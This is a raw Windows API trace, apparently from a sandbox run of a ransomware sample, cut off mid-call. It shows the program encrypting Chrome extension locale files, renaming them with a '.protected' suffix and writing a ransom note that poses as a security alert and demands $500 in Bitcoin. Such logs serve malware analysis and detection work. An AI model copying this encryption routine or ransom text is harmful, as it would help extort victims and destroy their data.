(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.134] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.134] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.135] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.135] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.135] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.135] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.135] CloseHandle (hObject=0x164) returned 1 [0080.135] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.135] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0080.135] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0080.135] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0080.135] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0080.135] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0080.135] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl") returned 141 [0080.136] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0080.136] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0080.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\*") returned 143 [0080.136] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.136] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.136] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.136] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.136] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.136] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\.") returned 143 [0080.136] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.136] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.136] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.136] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.136] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.136] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.136] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\..") returned 144 [0080.136] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.136] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.136] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.136] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.136] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.136] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.136] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.136] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json") returned 155 [0080.137] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.137] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.137] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.137] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.137] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json") returned 155 [0080.137] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.137] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json") returned 155 [0080.137] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.137] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json") returned 155 [0080.137] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.137] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0080.138] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.138] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0080.138] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.138] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.138] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.139] CloseHandle (hObject=0x168) returned 1 [0080.139] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.protected") returned 165 [0080.139] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.protected")) returned 1 [0080.139] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.139] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.140] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\RESTORE_FILES.txt") returned 159 [0080.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.140] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.140] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.141] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.141] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.141] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.141] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.141] CloseHandle (hObject=0x164) returned 1 [0080.141] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.141] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0080.141] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0080.141] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0080.141] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0080.141] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0080.141] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR") returned 144 [0080.141] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0080.141] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0080.141] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\*") returned 146 [0080.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.142] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.142] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.142] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.142] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.142] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.142] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\.") returned 146 [0080.142] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.142] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.142] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.142] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.142] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.142] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.142] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.142] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\..") returned 147 [0080.142] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.142] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.142] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.142] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.142] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.142] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.142] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.142] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.142] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.142] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.142] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.142] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.143] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.144] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.144] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.144] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.144] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.144] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.144] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.144] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.145] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.145] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.145] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.145] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.145] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.145] CloseHandle (hObject=0x168) returned 1 [0080.145] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.protected") returned 168 [0080.145] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0080.146] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.146] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.146] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 162 [0080.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 